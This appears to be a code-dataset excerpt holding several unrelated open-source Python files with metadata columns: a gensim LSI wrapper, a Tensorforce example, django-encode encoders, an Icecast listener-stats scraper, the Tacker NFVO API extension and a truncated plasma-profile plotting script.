X should be a list of tokens for each document, e.g. [['This', 'is', 'document', '1'], ['Second', 'document']]
"""
def __init__(self, n_latent_topics = 100, use_tfidf = True, chunksize = 20000, decay = 1.0, distributed = False, onepass = True, power_iters = 2, extra_samples = 100):
self.n_latent_topics = n_latent_topics
self.use_tfidf = use_tfidf
self.chunksize = chunksize
self.decay = decay
self.distributed = distributed
self.onepass = onepass
self.power_iters = power_iters
self.extra_samples = extra_samples
def transform(self, X):
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
corpus = self.tfidf[corpus]
corpus_lsi = self.model[corpus]
corpus_lsi_dense = matutils.corpus2dense(corpus_lsi, self.n_latent_topics).T
return corpus_lsi_dense
def fit(self, X, y=None):
self.dictionary = corpora.Dictionary(X)
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
self.tfidf = models.TfidfModel(corpus)
corpus = self.tfidf[corpus]
self.model = models.LsiModel(corpus, id2word = self.dictionary, num_topics = self.n_latent_topics, chunksize = self.chunksize, decay = self.decay, distributed = self.distributed, onepass = self.onepass, power_iters = self.power_iters, extra_samples = self.extra_samples)
return self
def get_params(self, deep = False):
return {'n_latent_topics': self.n_latent_topics, 'use_tfidf': self.use_tfidf, 'chunksize': self.chunksize, 'decay': self.decay, 'distributed': self.distributed, 'onepass': self.onepass, 'power_iters': self.power_iters, 'extra_samples': self.extra_samples} | mit | -8,260,677,746,161,423,000 | 42.230769 | 372 | 0.715993 | false | 3.044118 | false | false | false |
reinforceio/tensorforce | examples/act_experience_update_interface.py | 1 | 2827 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from tensorforce import Agent, Environment
def main():
environment = Environment.create(environment='benchmarks/configs/cartpole.json')
agent = Agent.create(agent='benchmarks/configs/ppo.json', environment=environment)
# Train for 100 episodes
for episode in range(100):
# Record episode experience
episode_states = list()
episode_internals = list()
episode_actions = list()
episode_terminal = list()
episode_reward = list()
# Episode using independent-act and agent.intial_internals()
states = environment.reset()
internals = agent.initial_internals()
terminal = False
sum_rewards = 0.0
while not terminal:
episode_states.append(states)
episode_internals.append(internals)
actions, internals = agent.act(states=states, internals=internals, independent=True)
episode_actions.append(actions)
states, terminal, reward = environment.execute(actions=actions)
episode_terminal.append(terminal)
episode_reward.append(reward)
sum_rewards += reward
print('Episode {}: {}'.format(episode, sum_rewards))
# Feed recorded experience to agent
agent.experience(
states=episode_states, internals=episode_internals, actions=episode_actions,
terminal=episode_terminal, reward=episode_reward
)
# Perform update
agent.update()
# Evaluate for 100 episodes
sum_rewards = 0.0
for _ in range(100):
states = environment.reset()
internals = agent.initial_internals()
terminal = False
while not terminal:
actions, internals = agent.act(
states=states, internals=internals, independent=True, deterministic=True
)
states, terminal, reward = environment.execute(actions=actions)
sum_rewards += reward
print('Mean evaluation return:', sum_rewards / 100.0)
# Close agent and environment
agent.close()
environment.close()
if __name__ == '__main__':
main()
| apache-2.0 | -2,013,646,596,207,297,800 | 35.24359 | 96 | 0.638132 | false | 4.530449 | false | false | false |
collab-project/django-encode | encode/encoders.py | 1 | 4284 | # Copyright Collab 2013-2016
# See LICENSE for details.
"""
Encoders.
"""
from __future__ import unicode_literals
import os
import shlex
import logging
import subprocess
try:
from django.utils.module_loading import import_string
except ImportError:
from django.utils.module_loading import import_by_path as import_string
from converter.ffmpeg import FFMpeg, FFMpegError, FFMpegConvertError
from encode import EncodeError
from encode.conf import settings
logger = logging.getLogger(__name__)
def get_encoder_class(import_path=None):
"""
Get the encoder class by supplying a fully qualified path to
``import_path``.
If ``import_path`` is ``None`` the default encoder class specified in the
:py:data:`~encode.conf.ENCODE_DEFAULT_ENCODER_CLASS` is returned.
:param import_path: Fully qualified path of the encoder class, for example:
``encode.encoders.BasicEncoder``.
:type import_path: str
:returns: The encoder class.
:rtype: class
"""
return import_string(import_path or settings.ENCODE_DEFAULT_ENCODER_CLASS)
class BaseEncoder(object):
"""
The base encoder.
:param profile: The encoding profile that configures this encoder.
:type profile: :py:class:`~encode.models.EncodingProfile`
:param input_path:
:type input_path: str
:param output_path:
:type output_path: str
"""
def __init__(self, profile, input_path=None, output_path=None):
self.profile = profile
self.input_path = input_path
self.output_path = output_path
def _build_exception(self, error, command):
"""
Build an :py:class:`~encode.EncodeError` and return it.
:param error: The description of the error.
:type error: str
:param command: The command used to produce the error.
:type command: str
:rtype: :py:class:`~encode.EncodeError`
"""
output = getattr(error, 'output', None)
exc = EncodeError(error)
exc.output = output
exc.command = command
logger.error('Command output: {}'.format(output))
return exc
@property
def command(self):
"""
The command for the encoder with the vars injected, eg.
``convert "/path/to/input.gif" "/path/to/output.png"``.
:rtype: str
:returns: The command.
"""
args = {
"input": self.input_path,
"output": self.output_path
}
return str(self.profile.encode_cmd.format(**args))
class BasicEncoder(BaseEncoder):
"""
Encoder that uses the :py:mod:`subprocess` module.
"""
def start(self):
"""
Start encoding.
:raises: :py:exc:`~encode.EncodeError` if something goes wrong
during encoding.
"""
command = shlex.split(self.command)
try:
subprocess.check_output(command, stderr=subprocess.STDOUT)
except OSError as error:
if error.errno == os.errno.ENOENT:
# program not found
exc = self._build_exception("{}: {}".format(
command[0], str(error)), self.command)
else:
exc = self._build_exception(str(error), self.command)
raise exc
except subprocess.CalledProcessError as error:
exc = self._build_exception(error, self.command)
raise exc
class FFMpegEncoder(BaseEncoder):
"""
Encoder that uses the `FFMpeg <https://ffmpeg.org>`_ tool.
"""
def start(self):
"""
Start encoding.
:raises: :py:exc:`~encode.EncodeError` if something goes wrong
during encoding.
"""
command = shlex.split(self.profile.command)
try:
ffmpeg = FFMpeg(self.profile.encoder.path)
job = ffmpeg.convert(self.input_path, self.output_path, command)
for timecode in job:
logger.debug("Encoding (time: %f)...\r" % timecode)
except FFMpegError as error:
exc = self._build_exception(error, self.profile.command)
raise exc
except FFMpegConvertError as error:
exc = self._build_exception(error.details, self.profile.command)
raise exc
| mit | -5,457,834,688,075,999,000 | 26.63871 | 79 | 0.611578 | false | 4.111324 | false | false | false |
Xicnet/radioflow-scheduler | project/icecast_stats/realtime_stats.py | 1 | 5653 | __version__ = "0.1"
__author__ = "radiocicletta <[email protected]>"
# borrowed from: https://github.com/radiocicletta/morganfreeman
import threading
from SocketServer import ThreadingTCPServer
import logging
import urllib2
from urllib import unquote
import re
import mimetypes
import os
import sys
import json
from StringIO import StringIO
from geo import GeoIP
logger = logging.getLogger('icecast.daemon')
ICECAST_V_2_3 = '2.3.'
ICECAST_V_2_4 = '2.4.'
ICECAST_V_KH = '-kh'
class StatsCollector():
def __init__(self, host, user, pw, realm, mount):
self.host = host
self.user = user
self.pw = pw
self.realm = realm
self.mount = mount
self.geo = GeoIP()
def run(self):
logger.debug("launched StatsCollector Instance")
try:
result = urllib2.urlopen(self.host + "/server_version.xsl")
except Exception as e:
print e
logger.error("Failed update: %s", e)
result = None
resultstr = result.read()
server_info = dict(
re.findall(
'<tr[^>]*>[\r\s]*<td[^>]*>([^\r<>]*?)</td>[\s\r]*'
'<td[^>]*>([^\r<>]*?)</td>',
resultstr)
)
self.server_version = re.match("Icecast (.*)", server_info['Version']).groups()[0]
if True:
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(
realm=self.realm,
uri=self.host + "/admin/",
user=self.user,
passwd=self.pw)
auth_handler_mounts = urllib2.HTTPBasicAuthHandler()
auth_handler_mounts.add_password(
realm=self.realm,
uri=self.host + "/admin/listmounts.xsl",
user=self.user,
passwd=self.pw)
opener_mounts = urllib2.build_opener(auth_handler_mounts)
urllib2.install_opener(opener_mounts)
# 1. retrieve all the current mount points
# 2. for each mount point
# gather information about listeners
# store in database
try:
result = urllib2.urlopen(self.host + "/admin/listmounts.xsl")
except Exception as e:
logger.error("Failed update: %s", e)
result = None
if not result:
return
mountpoints = re.findall(
"listclients\.xsl\?mount=/([^\"]*)", result.read())
#for mount in mountpoints:
if self.mount in mountpoints:
h_m = urllib2.HTTPBasicAuthHandler()
h_m.add_password(
realm=self.realm,
uri=self.host + "/admin/listclients.xsl?mount=/" + self.mount,
user=self.user,
passwd=self.pw)
o_m = urllib2.build_opener(h_m)
urllib2.install_opener(o_m)
try:
result = urllib2.urlopen(
self.host + "/admin/listclients.xsl?mount=/" + self.mount)
except:
logger.error("skipping %s", self.mount)
#continue
resultstr = result.read()
try:
# the latest (fourth in vanilla, third in -kh) table
# on listclients.xls is the relevant one
table = re.findall(
"<table[^>]*>([^\r]*?)</table>", resultstr)[-1]
except:
# 2.4.0
_table = re.findall(
'<table[^>]*class="colortable"[^>]*>([^\r]*?)</table>', resultstr)
if not _table:
#continue
pass
table = _table[0]
listeners = re.findall("<tr[^>]*>([^\r]*?)</tr>", table)
if ICECAST_V_KH in self.server_version:
rowskip = 0
else:
rowskip = 1
# in icecast vanilla, first row is the
# table header. in -kh, the header is enclosed in <thead>
# without use of <tr>
logger.debug("registering %d entries", len(listeners) - rowskip)
listener_details = []
for listener in listeners[rowskip:]:
fields = re.findall("<td[^>]*>([^\r]*?)</td>", listener)
if not ICECAST_V_KH in self.server_version: # vanilla
# fields[0]: IP
# fields[1]: Seconds since connection
# fields[2]: user-agent
# fields[3]: action
#print self.mount, fields[0], int(fields[1]), fields[2], self.geo.geoip(fields[0])
listener_details.append({'mount': self.mount, 'ip': fields[0], 'duration': int(fields[1]), 'user_agent': fields[2], 'country': self.geo.geoip(fields[0])})
else:
# fields[0]: IP
# fields[1]: Seconds since connection
# fields[2]: lag
# fields[3]: user-agent
# fields[4]: action
#print self.mount, fields[0], int(fields[1]), fields[3], self.geo.geoip(fields[0])
listener_details.append({'mount': self.mount, 'ip': fields[0], 'duration': int(fields[1]), 'user_agent': fields[3], 'country': self.geo.geoip(fields[0])})
return listener_details
| agpl-3.0 | 3,395,360,613,107,391,000 | 38.809859 | 178 | 0.482576 | false | 4.266415 | false | false | false |
stackforge/tacker | tacker/extensions/nfvo.py | 2 | 26383 | # Copyright 2016 Brocade Communications Systems Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from tacker._i18n import _
from tacker.api import extensions
from tacker.api.v1 import attributes as attr
from tacker.api.v1 import resource_helper
from tacker.common import exceptions
from tacker.plugins.common import constants
from tacker.services import service_base
class VimUnauthorizedException(exceptions.TackerException):
message = _("%(message)s")
class VimConnectionException(exceptions.TackerException):
message = _("%(message)s")
class VimInUseException(exceptions.TackerException):
message = _("VIM %(vim_id)s is still in use by VNF")
class VimDefaultNotDefined(exceptions.TackerException):
message = _("Default VIM is not defined.")
class VimDefaultDuplicateException(exceptions.TackerException):
message = _("Default VIM already exists %(vim_id)s.")
class VimNotFoundException(exceptions.TackerException):
message = _("Specified VIM id %(vim_id)s is invalid. Please verify and "
"pass a valid VIM id")
class VimRegionNotFoundException(exceptions.TackerException):
message = _("Unknown VIM region name %(region_name)s")
class VimKeyNotFoundException(exceptions.TackerException):
message = _("Unable to find key file for VIM %(vim_id)s")
class VimEncryptKeyError(exceptions.TackerException):
message = _("Barbican must be enabled for VIM %(vim_id)s")
class VimUnsupportedResourceTypeException(exceptions.TackerException):
message = _("Resource type %(type)s is unsupported by VIM")
class VimGetResourceException(exceptions.TackerException):
message = _("Error while trying to issue %(cmd)s to find resource type "
"%(type)s by resource name %(name)s")
class VimGetResourceNameNotUnique(exceptions.TackerException):
message = _("Getting resource id from VIM with resource name %(name)s "
"by %(cmd)s returns more than one")
class VimGetResourceNotFoundException(exceptions.TackerException):
message = _("Getting resource id from VIM with resource name %(name)s "
"by %(cmd)s returns nothing")
class VimFromVnfNotFoundException(exceptions.NotFound):
message = _('VIM from VNF %(vnf_id)s could not be found')
class ToscaParserFailed(exceptions.InvalidInput):
message = _("tosca-parser failed: - %(error_msg_details)s")
class VnffgdInvalidTemplate(exceptions.InvalidInput):
message = _("Invalid VNFFG template input: %(template)s")
class VnffgdDuplicateForwarderException(exceptions.InvalidInput):
message = _("Invalid Forwarding Path contains duplicate forwarder not in "
"order: %(forwarder)s")
class VnffgdDuplicateCPException(exceptions.InvalidInput):
message = _("Invalid Forwarding Path contains duplicate connection point "
": %(cp)s")
class VnffgdVnfdNotFoundException(exceptions.NotFound):
message = _("Specified VNFD %(vnfd_name)s in VNFFGD does not exist. "
"Please create VNFDs before creating VNFFG")
class VnffgdCpNotFoundException(exceptions.NotFound):
message = _("Specified CP %(cp_id)s could not be found in VNFD "
"%(vnfd_name)s. Please check VNFD for correct Connection "
"Point.")
class VnffgdCpNoForwardingException(exceptions.TackerException):
message = _("Specified CP %(cp_id)s in VNFD %(vnfd_name)s "
"does not have forwarding capability, which is required to be "
"included in forwarding path")
class VnffgdWrongEndpointNumber(exceptions.TackerException):
message = _("Specified number_of_endpoints %(number)s is not equal to "
"the number of connection_point %(cps)s")
class VnffgdInUse(exceptions.InUse):
message = _('VNFFGD %(vnffgd_id)s is still in use')
class VnffgdNotFoundException(exceptions.NotFound):
message = _('VNFFG Template %(vnffgd_id)s could not be found')
class VnffgCreateFailed(exceptions.TackerException):
message = _('Creating VNFFG based on %(vnffgd_id)s failed')
class VnffgInvalidMappingException(exceptions.TackerException):
message = _("Matching VNF Instance for VNFD %(vnfd_name)s could not be "
"found. Please create an instance of this VNFD before "
"creating/updating VNFFG.")
class VnffgParamValueFormatError(exceptions.TackerException):
message = _("Param values %(param_value)s is not in dict format.")
class VnffgTemplateParamParsingException(exceptions.TackerException):
message = _("Failed to parse VNFFG Template due to "
"missing input param %(get_input)s.")
class VnffgPropertyNotFoundException(exceptions.NotFound):
message = _('VNFFG Property %(vnffg_property)s could not be found')
class VnffgCpNotFoundException(exceptions.NotFound):
message = _("Specified CP %(cp_id)s could not be found in VNF "
"%(vnf_id)s.")
class VnffgNotFoundException(exceptions.NotFound):
message = _('VNFFG %(vnffg_id)s could not be found')
class VnffgInUse(exceptions.InUse):
message = _('VNFFG %(vnffg_id)s is still in use')
class VnffgVnfNotFoundException(exceptions.NotFound):
message = _("Specified VNF instance %(vnf_name)s in VNF Mapping could not "
"be found")
class VnffgDeleteFailed(exceptions.TackerException):
message = _('Deleting VNFFG %(vnffg_id)s failed')
class VnffgInUseNS(exceptions.TackerException):
message = _('VNFFG %(vnffg_id)s belongs to active network service '
'%(ns_id)s')
class NfpAttributeNotFoundException(exceptions.NotFound):
message = _('NFP attribute %(attribute)s could not be found')
class NfpNotFoundException(exceptions.NotFound):
message = _('NFP %(nfp_id)s could not be found')
class NfpInUse(exceptions.InUse):
message = _('NFP %(nfp_id)s is still in use')
class NfpPolicyCriteriaError(exceptions.PolicyCheckError):
message = _('%(error)s in policy')
class NfpPolicyCriteriaIndexError(exceptions.TackerException):
message = _('Criteria list can not be empty')
class NfpDuplicatePolicyCriteria(exceptions.TackerException):
message = _('The %(first_dict)s and %(sec_dict)s are overlapped')
class NfpDuplicatePathID(exceptions.TackerException):
message = _('The path_id %(path_id)s is overlapped with '
'NFP %(nfp_name)s in %(vnffg_name)s')
class NfpPolicyTypeError(exceptions.PolicyCheckError):
message = _('Unsupported Policy Type: %(type)s')
class NfpForwarderNotFoundException(exceptions.NotFound):
message = _('VNFD Forwarder %(vnfd)s not found in VNF Mapping %(mapping)s')
class NfpRequirementsException(exceptions.TackerException):
message = _('VNFD Forwarder %(vnfd)s specified more than twice in '
'requirements path')
class SfcInUse(exceptions.InUse):
message = _('SFC %(sfc_id)s is still in use')
class SfcNotFoundException(exceptions.NotFound):
message = _('Service Function Chain %(sfc_id)s could not be found')
class ClassifierInUse(exceptions.InUse):
message = _('Classifier %(classifier_id)s is still in use')
class ClassifierNotFoundException(exceptions.NotFound):
message = _('Classifier %(classifier_id)s could not be found')
class VnfMappingNotFoundException(exceptions.NotFound):
message = _('VNF mapping not found/defined')
class VnfMappingNotValidException(exceptions.TackerException):
message = _('The %(vnfd)s is not found in constituent VNFDs')
class NSDInUse(exceptions.InUse):
message = _('NSD %(nsd_id)s is still in use')
class NSInUse(exceptions.InUse):
message = _('NS %(ns_id)s is still in use')
class NoTasksException(exceptions.TackerException):
message = _('No tasks to run for %(action)s on %(resource)s')
class UpdateChainException(exceptions.TackerException):
message = _("%(message)s")
class CreateChainException(exceptions.TackerException):
message = _("%(message)s")
class UpdateClassifierException(exceptions.TackerException):
message = _("%(message)s")
class UpdateVnffgException(exceptions.TackerException):
message = _("%(message)s")
class FlowClassiferCreationFailed(exceptions.TackerException):
message = _("%(message)s")
NAME_MAX_LEN = 255
RESOURCE_ATTRIBUTE_MAP = {
'vims': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'type': {
'allow_post': True,
'allow_put': False,
'validate': {'type:not_empty_string': None},
'is_visible': True
},
'auth_url': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True
},
'auth_cred': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_not_empty': None},
'is_visible': True,
},
'vim_project': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_not_empty': None},
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'status': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'placement_attr': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': None,
},
'shared': {
'allow_post': False,
'allow_put': False,
'is_visible': False,
'convert_to': attr.convert_to_boolean,
'required_by_policy': True
},
'is_default': {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'vnffgds': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'template': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'template_source': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': 'onboarded'
}
},
'vnffgs': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'vnffgd_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'default': None
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'vnf_mapping': {
'allow_post': True,
'allow_put': True,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'attributes': {
'allow_post': True,
'allow_put': True,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'symmetrical': {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'forwarding_paths': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'vnffgd_template': {
'allow_post': True,
'allow_put': True,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'ns_id': {
'allow_post': True,
'allow_put': False,
'is_visible': True,
'default': None,
},
},
'nfps': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'vnffg_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'name': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'classifier_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'chain_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'path_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
},
'symmetrical': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'sfcs': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'nfp_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'chain': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'path_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'symmetrical': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'validate': {'type:boolean': None},
'default': False,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
},
'classifiers': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True
},
'nfp_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
},
'match': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'chain_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
},
'nsds': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'attributes': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'template_source': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': 'onboarded'
},
},
'nss': {
'id': {
'allow_post': False,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'primary_key': True,
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'required_by_policy': True,
'is_visible': True,
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {'type:string': NAME_MAX_LEN},
'is_visible': True,
'default': '',
},
'created_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'updated_at': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'vnf_ids': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'vnffg_ids': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'nsd_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True,
'default': None,
},
'placement_attr': {
'allow_post': True,
'allow_put': False,
'validate': {'type:dict_or_none': None},
'is_visible': True,
'default': {},
},
'vim_id': {
'allow_post': True,
'allow_put': False,
'validate': {'type:string': None},
'is_visible': True,
'default': '',
},
'status': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'error_reason': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'attributes': {
'allow_post': True,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
'mgmt_ip_addresses': {
'allow_post': False,
'allow_put': False,
'convert_to': attr.convert_none_to_empty_dict,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
},
'nsd_template': {
'allow_post': True,
'allow_put': False,
'validate': {'type:dict_or_nodata': None},
'is_visible': True,
'default': None,
},
},
}
class Nfvo(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return 'NFV Orchestrator'
@classmethod
def get_alias(cls):
return 'NFVO'
@classmethod
def get_description(cls):
return "Extension for NFV Orchestrator"
@classmethod
def get_namespace(cls):
return 'https://wiki.openstack.org/Tacker'
@classmethod
def get_updated(cls):
return "2015-12-21T10:00:00-00:00"
@classmethod
def get_resources(cls):
special_mappings = {}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, RESOURCE_ATTRIBUTE_MAP)
attr.PLURALS.update(plural_mappings)
return resource_helper.build_resource_info(
plural_mappings, RESOURCE_ATTRIBUTE_MAP, constants.NFVO,
translate_name=True)
@classmethod
def get_plugin_interface(cls):
return NFVOPluginBase
def update_attributes_map(self, attributes):
super(Nfvo, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
def get_extended_resources(self, version):
version_map = {'1.0': RESOURCE_ATTRIBUTE_MAP}
return version_map.get(version, {})
class NFVOPluginBase(service_base.NFVPluginBase, metaclass=abc.ABCMeta):
def get_plugin_name(self):
return constants.NFVO
def get_plugin_type(self):
return constants.NFVO
def get_plugin_description(self):
return 'Tacker NFV Orchestrator plugin'
@abc.abstractmethod
def create_vim(self, context, vim):
pass
@abc.abstractmethod
def update_vim(self, context, vim_id, vim):
pass
@abc.abstractmethod
def delete_vim(self, context, vim_id):
pass
@abc.abstractmethod
def get_vim(self, context, vim_id, fields=None, mask_password=True):
pass
@abc.abstractmethod
def get_vims(self, context, filters=None, fields=None):
pass
def get_vim_by_name(self, context, vim_name, fields=None,
mask_password=True):
raise NotImplementedError()
def get_default_vim(self, context):
pass
| apache-2.0 | -2,946,161,441,141,614,000 | 28.120309 | 79 | 0.522003 | false | 3.883279 | false | false | false |
cfe316/atomic | examples/profiles.py | 1 | 3300 | """
typical carbon content is n_c / n_e = 0.05
"""
import numpy as np
import matplotlib.pyplot as plt
import atomic
from ensemble_average import annotate_lines
def parabolic_profile(y0):
x = np.linspace(1., 0, 50)
y = 1 - x**2
y *= y0
return x, y
r, temperature = parabolic_profile(3e3)
r, density = parabolic_profile(1e19)
try:
ad
except NameError:
from atomic.pec import TransitionPool
ad = atomic.element('argon')
tp = TransitionPool.from_adf15('adas_data/transport_llu#ar*.dat')
ad = tp.filter_energy(2e3, 20e3, 'eV').create_atomic_data(ad)
eq = atomic.CollRadEquilibrium(ad)
y = eq.ionisation_stage_distribution(temperature, density)
ne_tau = np.array([1e-1, 1e-2, 1e-3])
impurity_fraction = 0.05
texts = ['$10^{%d}$' % i for i in np.log10(ne_tau)]
try:
tau_ss
except NameError:
t_normalized = np.logspace(-4, 0, 500)
t_normalized -= t_normalized[0]
times = t_normalized
rt = atomic.RateEquations(ad)
yy = rt.solve(times, temperature, density)
tau_ss = yy.steady_state_time()
y_bar = yy.ensemble_average()
# prepare plots
f = plt.figure(1); f.clf()
ax1 = f.add_subplot(511)
ax2 = f.add_subplot(512, sharex=ax1)
#ax3 = f.add_subplot(513, sharex=ax1)
ax4 = f.add_subplot(513, sharex=ax1)
ax5 = f.add_subplot(514, sharex=ax1)
ax6 = f.add_subplot(515, sharex=ax1)
# density and temperature profiles
ax = ax1
ax.plot(r,density/1e19, r, temperature/1e3)
ax.set_xlabel(r'$\rho$')
# steady state time
ax = ax2
line, = ax.semilogy(r, tau_ss)
ax.set_ylabel(r'$\tau_\mathrm{ss}\ [s]$')
ax.set_ylim(ymax=2)
# fractional abundance
#ax = ax3
#lines_abundance = ax.semilogy(r, y.y.T*100)
#ax.set_ylim(0.3, 400)
#yy.y_collrad.replot_colored(line, lines_abundance)
def normalized_gradient(x, y):
return -np.gradient(y)/np.gradient(x)/y
